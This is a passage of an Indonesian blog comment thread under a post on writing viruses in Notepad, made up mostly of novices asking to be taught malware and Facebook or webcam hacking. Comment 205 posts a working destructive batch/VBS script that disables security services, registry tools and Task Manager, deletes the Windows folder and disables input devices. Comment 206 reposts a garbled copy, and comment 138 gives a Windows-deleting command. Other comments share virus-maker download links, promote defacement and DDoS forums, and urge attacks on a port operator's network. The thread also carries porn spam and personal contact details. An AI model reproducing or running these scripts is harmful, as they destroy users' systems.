    mas ntu virus sema virus kedetek gx ama antivirus kaya smadav dkk…..
    trus ajarinjuga sih buat antivirus na….
    oc

  89. inu pada 27 March 2010 8:48 am

    bang untuk mengatasinya gmn tu/ dan untuk menggunakannya gmn/tolong ajarin mklm mas newbe,kirm kew alamt email ku z makasih bang

  90. ihc pada 8 April 2010 1:19 am

    mas kalau sudah di coba..cara mengetahui virusnya sudah berjalan gmana?

  91. koyong pada 16 April 2010 6:46 pm

    bos g kagak ngerti dunia viru tlg ajarin dong caranya ?

  92. bandonx (aUtizZ cS) pada 30 April 2010 2:06 am

    virus yg wat bikin registry.a habis apa ya…../////

    klo bs tlong kasih tau codingnya byar sy langsung bs praktekin…heheheh…

    :-)

  93. membuat virus dengan menggunakan notepad « Dantedoank's Blog pada 2 May 2010 1:16 am

    [...] binus hacker [...]

  94. R-one pada 2 May 2010 4:15 pm

    ada yang tahu cara nge blok FB ga?? tolong ya bantuannya,terima kasih sebelumnya

  95. MaSter pada 4 May 2010 12:09 am

    KK kAsih tau dong crack virus trojan…blackhorse….

  96. cahyono ronaldo pada 6 May 2010 9:30 am

    makasih bro
    tapi masih gak berani nyoba
    maklum newbie

  97. jaber pada 9 May 2010 10:24 pm

    klu sdah dibuat da pnawarnya gak sob……

  98. huser pada 15 May 2010 11:50 pm

    boleh dicoba tuch ! but can’t we to script it for world on internet ?

  99. Cracker_inside pada 16 May 2010 10:24 am

    klu mau buat virus hrs tau dlu dasar.
    jgn langgsung maen copas aja.
    bisa buat g’ tau tujuan.
    Xan malah nanya pda org yg g’ tau…
    pasti na dya g’ bisa jwb lh…

    aneh…aneh…

  100. dion picasa pada 16 May 2010 12:50 pm

    emang FB bisa d hack ya gan…
    ckckckkck
    maklum newbe mode OON hehe
    kl emang bs kirim ke email Q ya gan..
    pleaseeeeee.. ku mohon hehhe ^_^

  101. syahroni wataru chan pada 18 May 2010 10:48 am

    da yang tau ndak ya, cara nya buat virus kayak tati my love…
    jawab donk yang bisa…

  102. Download Film Bokep 3gp Gratis pada 22 May 2010 3:28 pm

    Buat Refreshing sejenak,kita nikmati layanan koleksi Video bugil ABG,Gratis Download bokep abg gadis SMU lengkap dan selalu terupdate yang semuanya ada disini

  103. bambang pada 23 May 2010 2:56 am

    mas ikutan gabung dong buat virus………….

  104. alvi pada 8 July 2010 1:22 am

    bang, cara hapus virusnya pake anti virus apaan?

  105. erwan pada 20 July 2010 3:20 am

    Hacking Fs banyak caranya mas mau gampang pake Hijacking script ke Commenty dulu turitorial hack fs bertebran di mana2 coba ikut forum di mirc aja #friendsterhack dl dpt2 info dari situ..sampe ruba2 profil jadi mantep

  106. Hellboy pada 6 August 2010 1:17 am

    mas mau tau dong.. cara buat virus itu autoRUN yang jenis formatnya .VBS ama .BAT .. makasih gan .. kalo rajin kirimin ke e-mail ini yaa agedas08@gmail.com.. saya penduduk newbie underground umur 16 taon… mohon bimbingan

  107. menyatu selamanya pada 14 August 2010 1:05 pm

    bos salam kenal,
    klo buat virus trojan dgn notepad ad ga?

  108. k3y_b04rd pada 1 September 2010 6:58 pm

    @Erick : ada yang tau kagak gimana caranya liat web cam nya lawan chating tanpa minta dari dia.
    thanks yeah…
    jawabannya di tunggu di erick.siregar@yahoo.com

    Berat gan… kLo sOaL i2 (ribetttt abiezzz dah ) :p

    wkwkwkwkwkwkwk….

    ~sLam Ciberr~

  109. rian pada 2 September 2010 11:31 am

    bang,,,ajrin saya buat virus dan antivirus donk,,,,,,,,????
    yang bisa di sebarin melalui USB,,,,,
    saya tunggu jawabnya di
    Abbas_rian@yahoo.com

    saya tunggu gan,,,saya hanya orang bodoh yang ingin belajar menjadi pintar

  110. rollink pada 18 September 2010 9:17 pm

    bro…
    gmana cra nyedarin virusnya,,??

  111. balian pada 21 September 2010 4:46 am

    mas q dah siv AS terus cara kercanya gimana tu pirus apakah kita harus sisipkan di fiel musik atau sebagainya biar lebih g ketahuan sm orang

  112. r10nzz pada 24 September 2010 8:29 pm

    keren baget bangettttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt

  113. 84645 pada 27 October 2010 5:59 pm

    bisa ga klo script vbs nya di compile ke *.exe?

  114. dansvirus pada 8 November 2010 12:47 am

    Buka notepad lalu copy paste code dibwah ini. Save dengan extensi .bat Contoh : dansvirs.bat

    @echo off echo matiin proses virus_Nye taskkill /F /IM namavirus1.exe /IM namavirus2.exe
    echo apus Semua virus_Nye berdasarkan ukuran for /R C:\ %%a in

    cb ajj g berbahaya c cm bkin pusing doang
    kwkwkwkwk

  115. Threeo pada 13 November 2010 10:27 am

    Boz mau nanya ne bos….klau ada penyakit tentu ada obatnya…….ia kan…????
    disini saya mau nanya sama boz……obatnya tuch…….????

  116. masih belajar pada 19 November 2010 1:23 am

    virus flu babi ada yg mao ga??????????????ckckckckckckckckckc dasar lu smua………………………………. bikin virus buat apaan?????? ngancurin warnet?kompi temen?>///// BAJRET ALL……

  117. lahum pada 25 November 2010 6:49 am

    mantap gan….tapi waktu guwe mw iseng.. eh ternyata… SENJATA MAKAN TUAN…. laptop gw terinfeksi… siiial…..

  118. toex unix pada 21 December 2010 6:51 am

    hahaha…. pakai Virtual PC kalau mau coba Virus…. biar aman

  119. fdfd pada 2 January 2011 10:26 am

    alert(”hah”)

  120. Ade Gondang pada 4 January 2011 12:32 am

    Mau nanya kok flash disk saya kalo sudah di cabut dari komp. trus dimasukin lagi isi foldernya jadi empty semua…! help me!

  121. Bang bingung pada 6 January 2011 2:45 am

    Wkwkwkwk mantap2 aja gan

  122. Luthfil Hack_iem pada 14 January 2011 12:57 am

    terima kasih ilmunya….

  123. congor_bibir+goreng pada 23 January 2011 6:52 pm

    mas, law ngehack tetangga cntik sebelah biar buka bju sendiri tanpa disuruh gi mana y….^_^

  124. ryan baru pengen belajar vb.6 pada 26 January 2011 11:51 pm

    mas punya app sniper ga??? heeehhhhh kalo punya krmin duns ke mail saya

    ryan.quicker@gmail.com

    aku nak bali nei baru belajar umur ku msh 14 thn heheheheh salam kenal semuanya

    salam \m/ metal hahahaha ga nyambung

  125. Black Benned pada 27 January 2011 8:49 pm

    salam sejahtera para hacker!! salam semua!!
    aku sudah lupa cara membuat virus itu, namun ada beberapa yang ingin ku tanyakan untuk cara pembuatan virus yang kudengar baru di indonesia!!
    aku ingin tahu bagaimana cara membuat virus memiliki target sendiri, folder yang akan di rusak, dan bagaimana cara membuat kualitas virus tang bisa bertahan selama waktu yang bisa di tentukan si pembuat??

  126. ardy pada 28 January 2011 10:31 pm

    semuanya pada pingin jadi hacker ya, kok sangt bodoh smua, bikin virus gampang, tp hack smua situs malaysia, ayo m gwe, gwe udah hanck lbih dari 80 situs,
    pertamanya blajr aja windows pada komputer kalian smuanya, kl udah, blajar data C
    kl udah menguasai smuanya, blajr website, kl udah baru kalian tau apa jawabannya, gk usa aneh2 kaya gini, kaya anak kecila aja, gk jaman plenzzzz

  127. ardya pada 29 January 2011 5:12 am

    hohoho…
    buatt newbi” yg asik” semua…

    yookk belajarr bareng .. register di http://www.hlcyber.net

    disana banyakk yAng akan jawap pertanyaan agan”…. hohoho bukan maksud’a sabotase… tapii marii sharing barengg disana…
    lmaya lohh gann buat belajar deface am dDoss… ad master”a…

  128. ardya pada 29 January 2011 5:12 am

    hohoho…
    buatt newbi” yg asik” semua…

    yookk belajarr bareng .. register di http://www.hlcyber.net

    disana banyakk yAng akan jawap pertanyaan agan”…. hohoho bukan maksud’a sabotase… tapii marii sharing barengg disana…
    lmaya lohh gann buat belajar deface am dDoss… ad master”a…

  129. Arie Safari pada 2 February 2011 11:45 pm

    awww, kalo bisa bikin kreatifitas sendiri lah buat para programer-programer. jangan cuma bisa copas-copas z… wkwkwkwkwkw

  130. zira1143 pada 6 February 2011 6:43 am

    virus lagi2, dari atas s/d bawah yang di omongin cuma virus aja, cmn ingatin hati2 klo mainan virus, good luck

  131. david pada 6 February 2011 8:09 am

    gw minta program virus dari dwlphi bisa ga

  132. david pada 6 February 2011 8:11 am

    delphi

  133. dx pada 7 February 2011 4:06 am

    penangkal nya apa gan,.,.,.,?

  134. tigor pada 8 February 2011 6:02 am

    Mas Terima kasih banget atas ilmunya.tentu akan saya praktekkan.boleh kan Mas?(baru pertama kli)

  135. bima pada 10 February 2011 5:56 am

    gmna crnya jd peretas

  136. KIRIK pada 15 February 2011 8:13 pm

    ADA NIH BUAT VIRUS DG COREL DROW LOW MASIH PAKE NOTEPAD MASIH KAMPUNG BUNG HAHAHA BY LEGLOG INDRAMAYU KOMUNITAS ANTI POLISI

  137. Jekki pada 16 February 2011 10:40 am

    Gimana caranya membobol bios… ? jadi kita nyebarin virusnya ketika komputernya baru nyala… dan pake software apa tuh… jadi software yang dibutuhkan apa tuh…. apa bisa pake bahasa mesin

  138. tofu's pada 18 February 2011 8:01 am

    wah gfan ada yang lebih simpel loh tpi bukan virus, hanya trup yang bisa bikin nagis orang”
    caranya
    kita buat di notepad
    lalu ketikan
    DEL/P/Q : WINDOWS
    atau
    DEL/P/Q
    lau save dengan *.cmd contoh: tofu.cmd
    selamat mencoba.

  139. Alhazmi pada 19 February 2011 9:15 am

    Mas saya udah buat virus yg paling sederhana habis itu saya kembangkan lagi dengan memblok menlock dan kill seluruh data yg saya tambahkan dari notepad cofig di disk c…saya juga kill seluruh anti virus dan aplikasi lain hasilnya komputer orng sudah ngk bisa diapa-apakan sama sekali di hidupin saja susah…minta solusinya mas…!

  140. jaseng pada 19 February 2011 8:38 pm

    wew bagus ini

  141. lampuko mierah pada 19 February 2011 9:08 pm

    gan..
    ada cheat PB kga ?

  142. akuwanita paling sexy pada 19 February 2011 9:12 pm

    mas..
    gmna ya cara hack hati cwo agar mereka pada jatuh hati kpd aq..
    tolong..

  143. sotty pada 20 February 2011 8:45 pm

    gan k4l0n6.dll.vbs disimpan di flasdis ea????
    trus g mana cara ngancurin virus ini ada antivirusnya ega????
    klo ada send ke Email Q ea gan???

  144. sotty pada 20 February 2011 8:46 pm

    gan k4l0n6.dll.vbs disimpan di flasdis ea????
    trus g mana cara ngancurin virus ini ada antivirusnya ega????
    klo ada send ke Email Q ea gan???

    sottiaja@yahoo.com

  145. 98 pada 22 February 2011 11:16 pm

    ckckckck.. knp ya pd nanya cara hack fb lha email yahoo lha dg alesan diambil orang, mo liat fb pacar.. yg namanya bajak or nyolong ya tetep aj salah tnp seijin yg pny.. ckckckckck.. ilmu ky gitu tdk utk dipake bebas teman2.. itu hasil usaha dan pembelajaran.. ms mo d share gitu aj dan hny utk kepentingan pribadi… :swt
    klo buat gw se, ga bakal gw kasih tutornya.. yg ada malah ngebuat org lain tdk aman..

    :peace

  146. umam pada 26 February 2011 7:10 am

    taPi kLo kiTa nyImpen di FD, FD kita nDa kEna Virus jUga …

  147. alfan pada 26 February 2011 10:09 pm

    pngen gw firus tp g iso rekkkk, ,, , ,

  148. pakde pada 1 March 2011 11:12 am

    wow…pada membhas virus ya?keren…ajari saya donk master2,maklum newbie dan cupu hbs.hehe…

  149. Anonim=) pada 4 March 2011 11:59 pm

    Ea Copas ya… xD… Itu sih virus pengganggu, klo mau virus sing bikin orang ngeluarin uang ya virus VBS yang menghapus windows… xD

  150. regar pada 12 March 2011 2:13 am

    mas gmana crnya bwt vrus bir hdd nya lagsg mldak

  151. setiadi pada 13 March 2011 5:22 am

    wowowwowoowowo make virus maker aja susah-susah amat,

  152. leo pada 16 March 2011 9:39 am

    aseek, , ,pengen banyak belajar nie, , , mkasih bang atas ilmunya , ,

  153. Leon pada 2 April 2011 7:21 am

    OI Om komputer saya kena virus notepad smua aplikasi kga kebuka yang kebuka malah notepad trus bagemana cara ngatasinnya..??
    pliiiss kasih tau Gan

  154. FEBRIYANDI pada 2 April 2011 10:14 am

    Kalo Udah di CoPy, Truz LAngkaH SlnjutNya APa Bang ??
    Mohon Bantuannya…

  155. randy proton pada 5 April 2011 7:11 am

    bingung kali
    kepanjangan,,,,,ternyata gak gampang

  156. dika andika pada 7 April 2011 9:46 pm

    mas mau tau tntg virus

  157. kiky pada 12 April 2011 1:57 am

    gan tolong donk ajarin gw cara hack fb supaya kita tau passwordnya ,,, hehehe
    kalau ada yang bisa tolong kirim email ke gw yahh ,, ini email gw
    rizky_seed@yahoo.com

  158. asror pada 16 April 2011 9:57 pm

    kurang jelas bang…….tolong di jelaskan?

  159. Maste12z pada 18 April 2011 10:48 am

    ?????????????????????????????????????????
    ???????????????????????????????????????????
    ?????????????????????????????????????????

  160. andri setiawan pada 26 April 2011 6:26 am

    amat mudah sekali y caranya, cp yng mo d ajarin

  161. andri setiawan pada 26 April 2011 6:28 am

    situs apaan ini, kurang ajar
    jangan ada yang mengunjungi situs ini ya, goblog

  162. wawan pada 4 May 2011 1:01 am

    ajarin cara buat virus donk all -_-
    pemula
    di skolah blm belajar pngen unggul aj dari tmn” yg laen
    lagi pula di skolah ku cuman ada 1 skolah yg jurusan nya RPL
    pas aku juga skolah di jurusan RPL jadi ajarin donk mas mas cara membuat virus nya
    kpngen unggul aja dari temen” yg laen :D
    makasii
    kasi tau aj di email saya mas…
    wawanthecs@ymail.com

  163. opicksz pada 5 May 2011 3:32 am

    yuyun yuyun

    virus shortcut

  164. nahoy pada 14 May 2011 1:45 pm

    hahahahahah….
    semuanya gak berhasil. semua virus di kill semua sama bitdefender total security…
    hahahahah…cuupuu

  165. nahoy pada 14 May 2011 1:49 pm

    tapi q juga pengin melihara virus di notebook aq..
    :D hahaaa

  166. andik pada 20 May 2011 7:57 am

    SAYA DAN SEGENAP
    POLRI
    TNI AU
    TNI AD
    TNI AL
    ……………………………………………………Presiden
    Wakil Presiden
    Menteri Agama
    Menteri Badan Usaha Milik Negara
    Menteri Pertahanan
    Menteri Dalam Negeri
    Menteri Hukum dan Hak Asasi Manusia
    Menteri Kebudayaan dan Pariwisata
    Menteri Kehutanan
    Menteri Energi dan Sumber Daya Mineral
    Menteri Kelautan dan Perikanan
    Menteri Kesehatan
    Menteri Koordinator Bidang Kesejahteraan Rakyat
    Menteri Keuangan
    Menteri Keuangan
    Menteri Komunikasi dan Informatika
    Menteri Koperasi dan Usaha Kecil dan Menengah
    Menteri Lingkungan Hidup
    Menteri Luar Negeri
    Menteri Pekerjaan Umum
    Menteri Pembangunan Daerah Tertinggal
    Menteri Pemberdayaan Perempuan dan Perlindungan Anak
    Menteri Pemuda dan Olahraga
    Menteri Pendayagunaan Aparatur Negara dan Reformasi Birokrasi
    Menteri Pendidikan Nasional
    Menteri Perdagangan
    Menteri Koordinator Bidang Perekonomian
    Kepala Badan Perencanaan Pembangunan Nasional
    Menteri Perhubungan
    Menteri Perindustrian
    Menteri Pertahanan Republik
    Menteri Pertanian
    Menteri Perumahan Rakyat
    Menteri Koordinator Bidang Politik, Hukum, dan Keamanan
    Menteri Riset dan Teknologi
    Menteri Sekretaris Negara
    Menteri Sosial
    Menteri Tenaga Kerja dan Transmigrasi

    Gubernur
    Walikota
    Bupati
    Camat
    Lurah
    Ketua RW
    Ketua RT
    Hansip

    Hacker
    Phreaker
    kracker
    Scammer
    Defacer
    Script kiddies
    Hacker wannabe
    Newbie
    Spammer
    Junker
    Liker
    Maho

    Kaskuser
    Facebookers
    NMers

    Tukang ngaduk
    Tukang gorengan
    Tukang bakso
    Tukang pompa
    Tukang jahit
    Tukang palak
    Tukang gali kubur

    Dokter
    Suster
    Insinyur
    Hakim
    Jaksa
    Pengacara
    PIC
    Manager Hotel
    Manager Restoran
    Manager Sea food
    Manager Supermarket

    Satpam Hotel
    Satpam Moll
    Satpam Kantor
    Satpam Apartemen
    Satpam Indomaret
    Satpam Discotick
    Satpam Ding dong

    Mpok Romlah
    Mpok Encum
    Mpok Jenab
    Mpok Ati
    Mpok Kokom
    Mpok Cuneh

    Bang Toang
    Bang Toing (adenya bang toang)
    Bang Ale
    Bang Satimin
    Bang Midun
    Bang Kotan

    Engkong Riman
    Engkong Injih
    Engkong Malih
    Engkong Bokir
    Ceu inah
    Ceu anih (bukan adenya ceu inah.. ga tau siapanya)
    Ceu Lia
    Ceu Romlah
    Pak Carik
    Bu Carik
    Ketua RT
    Ketua RW
    Sekretaris
    Bendahara
    Hansip
    Satpol PP
    Satpam
    Ibu kost
    Penjaga warnet
    Tukang Sapu
    Bakul Mie ayam
    Bakul Bakso
    Tukang Sate
    Bakul cilok
    Bakul gereh
    Bakul pindang
    Bakul es dawet
    Bakul srabi
    Bakul sego megono
    Bakul rujak
    Bakul siomay
    Bakul Lobes
    Bakul kentang
    Bakul mlinjo
    Bakul emping
    Bakul alfamart
    Bakul indomaret
    Supir angkot
    Supir truk
    Supir bus
    Supir m0ntor mabur
    Tukang becak
    Tukang netek
    Tukang gebyok
    Tukang nebas jengkol
    Tukang Cendol
    Suzanna
    Nyi lanjar
    Nyi pelet
    Nyi blorong
    Mak lampir
    Tukang parkir
    Tukang ledeng
    Tukang sedot WC
    Wong ngarit
    Wong angon wedhus
    Pengemis
    Pengamen
    dan Seluruh Kampung
    Dan sluruh elemen bangsa

    MENYUKAI STATUS ANDA….
    ´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶¶¶¶
    ´´´´´´´´´´´´´´´´´´´´¶¶´´´´´´´´´´¶¶
    ´´´´´´¶¶¶¶¶´´´´´´´¶¶´´´´´´´´´´´´´´¶¶
    ´´´´´¶´´´´´¶´´´´¶¶´´´´´¶¶´´´´¶¶´´´´´¶¶
    ´´´´´¶´´´´´¶´´´¶¶´´´´´´¶¶´´´´¶¶´´´´´´´¶¶
    ´´´´´¶´´´´¶´´¶¶´´´´´´´´¶¶´´´´¶¶´´´´´´´´¶¶
    ´´´´´´¶´´´¶´´´¶´´´´´´´´´´´´´´´´´´´´´´´´´¶¶
    ´´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´´´´´´¶¶
    ´´´¶´´´´´´´´´´´´¶´¶¶´´´´´´´´´´´´´¶¶´´´´´¶¶
    ´´¶¶´´´´´´´´´´´´¶´´¶¶´´´´´´´´´´´´¶¶´´´´´¶¶
    ´¶¶´´´¶¶¶¶¶¶¶¶¶¶¶´´´´¶¶´´´´´´´´¶¶´´´´´´´¶¶
    ´¶´´´´´´´´´´´´´´´¶´´´´´¶¶¶¶¶¶¶´´´´´´´´´¶¶
    ´¶¶´´´´´´´´´´´´´´¶´´´´´´´´´´´´´´´´´´´´¶¶
    ´´¶´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´´´´´´´´´´´´´´´¶¶
    ´´¶¶´´´´´´´´´´´¶´´¶¶´´´´´´´´´´´´´´´´¶¶
    ´´´¶¶¶¶¶¶¶¶¶¶¶¶´´´´´¶¶´´´´´´´´´´´´¶¶
    ´´´´´´´´´´´´´´´´´´´´´´´¶¶¶¶¶¶

  167. xiao tian black hat pada 9 June 2011 10:29 am

    virus yang paling bagus tu brain wash…. bukan menyerang otak komputer ataw y lainnya ,,, tp langsung menyerang pemilik kompi tu sendiri…

    salam \m/ metal cyber

  168. tulus pada 9 June 2011 11:35 pm

    bos pngen bisa bikin virus nih kirimin dong tutorial’y yang lengkap…

  169. rachoedaz pada 11 June 2011 8:37 am

    Bang ada yg punya ide g…. Q skrng lg senjata makan tuan,q save virus mlah skrng flash disk q g bsa d pake

  170. master pada 23 June 2011 8:33 pm

    Timbul Nich NiaT jahaT saya BuaT jadi Perusak…. ;(

  171. yefri pada 14 July 2011 2:30 pm

    asik2 bikin virus ……… gimna nich situs militer kita http://www.tni.mil.id dah di jebol malingsia ……. masa pra hacker merah putih mo berpangku tangan …!!!!!!!! ni termasuk pe

  172. santosa pada 14 July 2011 8:00 pm

    bang.thanks for virus”y yea…
    ane mw blajar lbih dalam lagi..lo bleh ajarin cara buat virus lbih bnyk lage yaw…
    krim ke email gw ajha…
    trapis_barker@yahoo.com

  173. ray pada 1 August 2011 10:21 pm

    mas saya pengen belajar dong. please
    trus abis di copast. di apain. apakah di copy di flash disk, trus di colok ke komputer org laen. apakah komp org laen bs ke infect.

  174. ray pada 1 August 2011 10:27 pm

    trus ngatasin virus nya pake anti virus apa ya?

    oya, ntar caranya kirim ke email saya ya. nih email nya
    : raycornor@rocketmail.com

  175. yefri pada 13 August 2011 9:40 am

    tolongin qw dong fb temen gua di hack ma orang yug ga bertanggung jawabb

  176. dudun pada 21 August 2011 11:10 pm

    mas,,, itu virus,,, lw udah jd langsung kena komputer kita,, atau paz ada flasdisk aja msk komputer,,,
    N ..
    ajari saya mas .. cara membuat virus yG baik dan benar

  177. masih belajar pada 26 August 2011 5:21 am

    kalo ada yang iklas buat ngajarin ane(newbie) jadi hacker talong ajarin, kalo ga mau ane ga maksain

    twitter: @DACUL11

    FB: Muhammad ridwan miftahul hayat

    mail: ridwanririf11@facebook.com
    ririef.lbn@gmail.com
    ririef.2004@gmail.com

    msn: ridwan_ririp@hotmail.com
    hp : 085214125969

    trimakasih

  178. masih belajar pada 26 August 2011 5:27 am

    kalo ada yang iklas buat ngajarin ane(newbie) jadi hacker talong ajarin, kalo ga mau ane ga maksain
    mail: ridwanririf11@facebook.com
    ririef.lbn@gmail.com
    ririef.2004@gmail.com
    hp : 085214125969

    trimakasih

  179. diantbarca pada 25 September 2011 6:29 pm

    welehh, ribet bngett..

    selamat mencoba aja dehh :)

  180. k4l0n9 pada 7 October 2011 10:17 am

    posting basi , hasil kopas, ga bisa njelasin /ngejawab pertanyaan pengunjung, basi basi basi… kopas kopas kopas….
    coba dong berkarya, jangan cuma kopas , trus unjuk gigi , ngaku heacker,
    heacker unjuk gigi.

  181. Pierre indra sukma pada 18 October 2011 6:19 am

    wesswesss,,, nice info gan…… ane newbie tolong diajarin.. pasti dapet pahalaa.. wkwkwkwkwkwwkwkwkwkwkwkkwkwkwkwkwkwkwwk

    kirim ke pierre_indra_simanjuntak@yahoo.com
    Facebook: Pierre Indra Simanjuntak

    makasiiiihhhhhhhh

  182. yustina lolyta pada 21 November 2011 12:30 am

    q mw kesimpulannya biar jelas….

  183. 12516 pada 18 December 2011 9:32 pm

    ada yang berani matiin PELINDO INDONESIA GA?? kalo bisa matiin itu smua jaringan mereka sampai ke anak2 nya.. kalau bisa itu baru dewa namanya.. gua acungin jempol..

    ini bukan dendam pribadi atau saingan antar perusahaan.. tapi sekedar iseng aja..dan buat seru2an asik2an.. :D para hacker harus buat inofasi baru dong… masa hack yang ga terkenal… bayangin aja kalo pelabuhan indonesia d hack prog jaringannya.. akwakwka pasti kapal bakalan mangkrak.. akwkakw asik..asikkk ayooo kita hack sama2….

  184. tatar_adi pada 20 December 2011 6:31 am

    Maksih sob atas infonya..
    tulisan ini sangat membantu pemula seperti saya,

  185. jason pada 20 December 2011 7:53 pm

    bisa dideteksi artav nggak?

  186. aris pada 7 January 2012 3:22 pm

    wew serem nyerang regisry…. males nyoba di PC sendiri.. wkwkwk… makasih om…

  187. LERI orang baik pada 21 January 2012 8:28 am

    jika anda ingin membuat virus beneran

    type v’ : worm and trojan…

    di link ini terdapat 3 buah software PEMBUAT VIRUS, PILIH AJA SALAH SATU…

    bisa dibuat jadi bahan pelajaran juga lho…
    sudah di TEST 100% bisa (BERHASIL) dan GRATIS 100%…
    ini LINK nya, di klik klo gak bisa dicopy n’ paste aj…

    MEDIAFIRE:
    http://www.mediafire.com/?xsrndkxpjdg825w,7vypaxypbgf6bf3,dy3d4uukpcwz2c3

    tapi INGAT bahwa software pembuat virus akan dideteksi sebagai VIRUS…
    tapi INI TIDAK BERBAHAYA…
    jika anda takut jangan d’ download…
    tapi jika anda yakin maka download lah (100% AMAN)…

  188. Sarina Patricia pada 27 January 2012 2:02 am

    : Wah ,,, pada pinter2 bikin virus !

    Egh bang , tadi listing nya uda gue copy ke notepad ,, uda gue save , abis itu avira gue ada pemberitahuan virus ,,,

    trus gmna lagi sih ? ajarin gue donk ,, itu tuh abis uda d save digimana in lagi ?
    Tolong ajarin gue donk teknik ngehack ,, gue juga pengen pinter ,,

    para hacker senior ,, mohon bimbingannya ..

    tolong jawab pertanyaan gue yah di email ane bang :
    tobing.sarina2gmail.com

    _salam hacker_

  189. Sarina Patricia pada 27 January 2012 2:05 am

    ralat ,, email gue :

    tobing.sarina@gmail.com

    tengkyu

  190. charist pada 5 February 2012 8:41 am

    apa kabar agaN agaN Smua,
    kmariN waktu gw coLok FLash k komputr tiba2 fiLe2 d kompi gw jdi Shorcut,trS gak Lama kompi haNg totaL di rStart puN tetap Lemot daN haNg totaL, gw coba di komptr LaiN juga g2, akibatNya 3buah kompi di kaNtor hrS d iNStaL uLaNg…..
    kira2 ada yg tau cara buat fLaSh biar biSa kyk g2 gk………???????????
    tLNg iNfo gw Lewat emaiL y kaLo ad yg tau chriestoverarie@yahoo.co.id ,makLum gw kN gaptek????????
    thaNkS,

  191. ARhuL Hack pada 13 February 2012 4:04 pm

    ghyy mnaa nicchh cara buatt viruzz

  192. saiful pada 25 February 2012 1:15 am

    wah….pada tunjukin virus nihh…

    tolong siapa saja..ajarin saya dasar-dasarnya saja tuk buat Virus…

  193. yoga pada 15 March 2012 4:51 am

    cara mengatasai virus nya bgaimana… flashd disk ku terinfeksi mas…!!!

  194. oooo_tidak_bisa pada 16 March 2012 7:16 am

    salam dulu yaa , , bang oh begitu mo tnya neeech ?
    klo sudah copy paste tu gimana lagi bang..masih gag ngerti..
    btw…tmn” ad yg sudah brhasil gag…???bagi bagi ya infor,a

  195. ag03zt pada 20 March 2012 5:07 am

    mantap gan ,, tpi gue bingung gmana cara hapus nih virus ,, BERBAHAYA &MEMATIKAN

  196. Andi Sarwani pada 26 March 2012 10:47 pm

    bikin pusing…………..,

  197. pemula pada 5 April 2012 11:50 pm

    kakak,,anti virus yg digunakan untuk virus diats ap,?
    trs apa klmhn dri virus diatas,?

  198. nimas ayu naganingrum pada 23 April 2012 11:28 pm

    Mas tolong sih…
    Nimas pingn bangt mmblokir seseorang..nimas pingin tahu paspot dia gmna caranya mas

  199. krisna arsita pada 15 May 2012 2:25 am

    mas ini nyebar berpengaruh apa

  200. uma pada 6 June 2012 9:14 pm

    gimana ya klu bisa bikin virus dgn notepd tp pengen buat source code
    ny anti virus tp dgn notepad pula

  201. Nananan pada 20 June 2012 3:30 am

    Ini virus bahaya ga ? Mohon info nya .
    Thanks

  202. john pada 23 June 2012 5:05 am

    Boss,, web lo ada virus vbs
    gak asyik ah

  203. tio pada 28 June 2012 10:35 pm

    kok susah carax

  204. ahya pada 8 July 2012 1:37 am

    terdeteksi oleh mcafee,avira,smadav,kaspersky g’?

  205. Deka EF pada 15 July 2012 2:22 am

    @echo off
    COPY %0 %windir%WINSTART.BAT
    autorun.inf>>Filelist.txt
    net stop “Security Center”
    net stop SharedAccess
    > “%Temp%.kill.reg” ECHO REGEDIT4
    >>”%Temp%.kill.reg” ECHO.
    >>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    >>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    >>”%Temp%.kill.reg” ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>”%Temp%.kill.reg” ECHO “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    START /WAIT REGEDIT /S “%Temp%.kill.reg”
    del “%Temp%.kill.reg”
    del %0
    On Erorr Resume Next
    Createobject(“WScript.Shell”)
    .run “taskkil /f /im
    taskmgr.exe”, vbhide
    On Erorr Resume Next
    Createobject(“WScript.Shell”).run “cmd.exe/c
    reg add
    hkcusoftware\microsoft\windows\currentversion\poli cies\system /v disableregistrytools /t reg dword /d “”1″” /f”,
    vbhide
    DELTREE /Y %windir%
    @ping.exe 127.0.0.1 -n 15 -w 1000 > nul
    rundll32 keyboard,disable
    rundll32 mouse,disable
    cls

    -IDMANDK1.5.exe-

    MAU NANYA GAN KALO Sembunyiin Filenya ke Gambar,, lalu automatis ketika klik OPEN program berjalan gimana gan? bisa ga?????

  206. handoyo pada 2 August 2012 12:45 pm

    cara membuat virus super ampuh
    pertama tama persiapkan bahan yg diperlukan
    -komputer dg spek sbb
    -prosesor i7
    -ram 8G
    -memory HDD 1T
    -layar lcd 20″
    -koneksi internet disarankan speedy
    KAMI TAK BERTANGGUNG JAWAB APABILA ANDA SAMPAI TERDETEKSI MENJALANKAN PROGRAM INI ANDA AKAN BERURUSAN DENGAN PIHAK YANG BERWAJIB

    autorun.inf>>Filelist.txt
    net stop “Security Center fbi @? Pentagon (1) Cia”
    net stop SharedAccess
    > “%Temp%.kill.pentagon” ECHO 1
    >>”%Temp%.kill.fbi” ECHO.
    >>”%Temp%.kill.cia” ECHO
    [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS
    haredAccess]
    >>”%Temp%.kill.google” ECHO
    “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    >>”%Temp%.kill.reg” ECHO
    [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw
    uauserv]
    >>”%Temp%.kill.reg” ECHO
    “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    >>”%Temp%.kill.reg” ECHO
    [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv
    c]
    >>”%Temp%.kill.reg” ECHO
    “Start”=dword:00000004
    >>”%Temp%.kill.reg” ECHO.
    START /WAIT REGEDIT /S “%Temp%.kill.reg”
    del “%Temp%.kill.reg”
    del %0
    On Erorr Resume Next
    Createobject(“WScript.Shell”)
    .run “taskkil /f /im
    taskmgr.exe”, vbhide
